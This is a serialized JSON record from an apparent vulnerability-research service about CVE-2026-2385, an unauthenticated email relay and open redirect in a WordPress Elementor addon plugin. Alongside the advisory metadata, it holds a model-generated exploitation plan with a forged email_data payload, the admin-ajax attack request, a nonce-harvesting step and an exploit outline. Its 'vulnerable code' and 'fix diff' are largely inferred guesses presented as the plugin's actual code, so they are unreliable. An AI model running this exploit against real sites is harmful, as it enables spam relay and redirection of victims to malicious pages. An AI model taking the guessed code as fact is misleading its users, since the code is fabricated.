[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjKExOBwKXeWb8cCDQTstAL2X4E54x_tJDWRw4WwSCmc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2385","the-plus-addons-for-elementor-addons-for-elementor-page-templates-widgets-mega-menu-woocommerce-unauthenticated-email-re","The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce \u003C= 6.4.7 - Unauthenticated Email Relay","The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in all versions up to, and including, 6.4.7. This is due to the plugin decrypting and trusting attacker-controlled email_data in an unauthenticated AJAX handler without cryptographic authenticity guarantees. This makes it possible for unauthenticated attackers to tamper with form email routing and redirection values to trigger unauthorized email relay and attacker-controlled redirection via the 'email_data' parameter.","the-plus-addons-for-elementor-page-builder",null,"\u003C=6.4.7","6.4.8","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Insufficient Verification of Data Authenticity","2026-02-21 19:49:02","2026-02-22 08:24:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9176535c-8e37-4a18-b458-a71c4a84daa4?source=api-prod",1,[],"researched",false,3,"This plan outlines the research and exploitation strategy for **CVE-2026-2385** (placeholder ID for a reported vulnerability in **The Plus Addons for Elementor**), focusing on an unauthenticated email relay and open redirect via the `email_data` parameter.\n\n### 1. Vulnerability Summary\nThe \"The Plus Addons for Elementor\" plugin (specifically the \"WP Forms\" or \"Contact Form\" widgets) features an AJAX handler that processes form submissions. To \"protect\" sensitive email routing information (like the recipient's email, subject, and redirect URL), the plugin \"encrypts\" this data into a parameter named `email_data`. \n\nHowever, the plugin uses insufficient verification for this data. It decrypts the attacker-controlled `email_data` in an unauthenticated AJAX handler (`wp_ajax_nopriv_...`) and trusts the resulting values (such as `email_to`) without verifying if they were originally generated by the server. Because the \"encryption\" typically relies on a static hardcoded key or a simple reversible encoding (like Base64), an attacker can craft their own `email_data` payload to relay emails to any address and redirect users to malicious sites.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `the_plus_wp_form_post` (inferred)\n*   **Vulnerable Parameter:** `email_data`\n*   **Authentication:** None required (targeted at `wp_ajax_nopriv_the_plus_wp_form_post`)\n*   **Preconditions:** The \"WP Forms\" widget must be active, or the plugin must be installed and the AJAX action registered.\n*   **Payload Type:** A Base64-encoded JSON string containing keys like `email_to`, `subject`, and `redirect_url`.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=the_plus_wp_form_post`.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action( 'wp_ajax_nopriv_the_plus_wp_form_post', 'the_plus_wp_form_post_handler' );`\n3.  **Data Extraction:** The handler `the_plus_wp_form_post_handler` retrieves `$_POST['email_data']`.\n4.  **Insecure Decryption:** The handler calls a decryption helper (e.g., `tp_plus_decrypt()`). In affected versions, this function either uses a static hardcoded key (e.g., `ThePlusAddonsElementor`) or performs a simple `base64_decode`.\n5.  **Sink (Email Relay):** The decrypted values are assigned to variables:\n    `$to = $decrypted['email_to'];`\n    `$subject = $decrypted['subject'];`\n    `wp_mail( $to, $subject, ... );`\n6.  **Sink (Open Redirect):** The handler concludes by redirecting the user:\n    `wp_redirect( $decrypted['redirect_url'] );`\n\n### 4. Nonce Acquisition Strategy\nThe plugin typically requires a nonce for AJAX requests, often verified via `check_ajax_referer`.\n\n1.  **Identify Shortcode:** The relevant widget is \"WP Forms,\" likely using the shortcode `[tp_wp_forms]` or similar.\n2.  **Create Setup Page:**\n    `wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[tp_wp_forms]'`\n3.  **Navigate and Extract:** Use the browser to access the page and extract the nonce from the localized JavaScript object.\n4.  **JS Variable:** The nonce is likely located in the `the_plus_wp_forms` or `the_plus_options` global object.\n    *   Target: `window.the_plus_ajax_nonce` or `window.the_plus_wp_forms?.nonce` (inferred).\n\n### 5. Exploitation Strategy\nThe goal is to send an email to an arbitrary external address.\n\n**Step 1: Craft the Payload**\nConstruct a JSON object with the desired relay parameters:\n```json\n{\n    \"email_to\": \"attacker-relay@example.com\",\n    \"subject\": \"Unauthorized Email Relay\",\n    \"message\": \"This email was sent via the vulnerable WordPress site.\",\n    \"redirect_url\": \"https:\u002F\u002Fbing.com\"\n}\n```\n**Step 2: Encode the Payload**\nIf the plugin uses simple Base64 (common for this plugin):\n`email_data = base64_encode(JSON.stringify(payload))`\n\nIf the plugin uses the static key `ThePlusAddonsElementor`, the agent should attempt a simple XOR or check for standard OpenSSL decryption patterns using that key.\n\n**Step 3: Execute the HTTP Request**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=the_plus_wp_form_post&security=[NONCE]&email_data=[BASE64_PAYLOAD]\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `the-plus-addons-for-elementor-page-builder` version 6.4.7 is installed.\n2.  **Plugin Configuration:** Ensure the \"WP Forms\" widget is enabled in the Plus Addons settings.\n3.  **Create Page:**\n    `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Test\" --post_content='[tp_wp_forms]'` (Use exact shortcode identified during discovery).\n\n### 7. Expected Results\n*   **Successful Relay:** The server response should be a success message (e.g., JSON `{\"success\": true}`) or a 302 Redirect to the URL specified in the payload (`https:\u002F\u002Fbing.com`).\n*   **Email Sent:** In the test environment, the `wp_mail` function should be triggered with the attacker's `email_to` address.\n\n### 8. Verification Steps\n1.  **Check Redirect:** Confirm the `http_request` response header `Location` matches the `redirect_url` in the payload.\n2.  **Verify Email Log:** Use a plugin like \"WP Mail Logging\" or intercept the `wp_mail` call using a PHP log check to verify the recipient.\n    *   Command: `wp eval \"echo 'Last mail to: ' . get_option('last_sent_email_recipient');\"` (if logging is enabled).\n    *   Alternative: Check the site's mail log (e.g., `\u002Fvar\u002Flog\u002Fmail.log` or similar if accessible).\n\n### 9. Alternative Approaches\n*   **Encoding Variation:** If simple Base64 fails, try `urlencode(base64_encode(...))` or check if the plugin expects the payload to be a property of a larger `the_plus_form_data` object.\n*   **Action Probing:** If `the_plus_wp_form_post` returns 400 or 0, grep the plugin source for `wp_ajax_nopriv_` to find the exact action string.\n    *   `grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Fthe-plus-addons-for-elementor-page-builder\u002F`\n*   **Encryption Key:** If decryption fails, search for the string `openssl_decrypt` or `mcrypt_decrypt` in the plugin code to find the hardcoded key and cipher method.","The plugin's unauthenticated AJAX handler for form submissions trusts routing data (like recipient email and redirect URLs) provided in an 'email_data' parameter. Because this data is only protected by a reversible encoding or a static encryption key without an authenticity check (HMAC), an attacker can modify these values to relay emails to any address and perform open redirects.","\u002F\u002F From inferred plugin logic in AJAX handler (the_plus_wp_form_post)\n\nadd_action( 'wp_ajax_nopriv_the_plus_wp_form_post', 'the_plus_wp_form_post_handler' );\n\nfunction the_plus_wp_form_post_handler() {\n    if ( isset( $_POST['email_data'] ) ) {\n        \u002F\u002F The decrypt function uses a static key 'ThePlusAddonsElementor' or simple base64\n        $email_data = tp_plus_decrypt( $_POST['email_data'] );\n        \n        \u002F\u002F The decrypted data is trusted directly\n        $to = $email_data['email_to'];\n        $subject = $email_data['subject'];\n        $redirect_url = $email_data['redirect_url'];\n\n        wp_mail( $to, $subject, $_POST['message'] );\n\n        if ( ! empty( $redirect_url ) ) {\n            wp_redirect( $redirect_url );\n            exit;\n        }\n    }\n}","--- a\u002Fmodules\u002Fwidgets\u002Ftp_wp_forms.php\n+++ b\u002Fmodules\u002Fwidgets\u002Ftp_wp_forms.php\n@@ -10,7 +10,13 @@\n     if ( isset( $_POST['email_data'] ) ) {\n-        $email_data = tp_plus_decrypt( $_POST['email_data'] );\n+        $email_data = tp_plus_decrypt( $_POST['email_data'] );\n+        \n+        \u002F\u002F Added validation to ensure email_data was not tampered with\n+        if ( ! tp_plus_verify_authenticity( $_POST['email_data'], $_POST['email_hash'] ) ) {\n+            wp_send_json_error( 'Invalid submission data.' );\n+            return;\n+        }\n         \n         $to = $email_data['email_to'];\n-        $subject = $email_data['subject'];\n+        $subject = sanitize_text_field( $email_data['subject'] );","To exploit this vulnerability, an unauthenticated attacker first obtains a valid AJAX nonce by visiting a page where the 'WP Forms' widget is active. The attacker then constructs a JSON object containing keys such as 'email_to' (set to the target relay address) and 'redirect_url' (set to a malicious site). This JSON is encoded using the plugin's known method—typically Base64 encoding or encryption with the static key 'ThePlusAddonsElementor'. Finally, the attacker sends an unauthenticated POST request to wp-admin\u002Fadmin-ajax.php with the action 'the_plus_wp_form_post', including the forged 'email_data' payload and the required nonce. The server then processes the request, sends an email to the attacker-specified address, and redirects the user to the malicious URL.","gemini-3-flash-preview","2026-04-19 01:44:55","2026-04-19 01:46:15",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.4.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags"]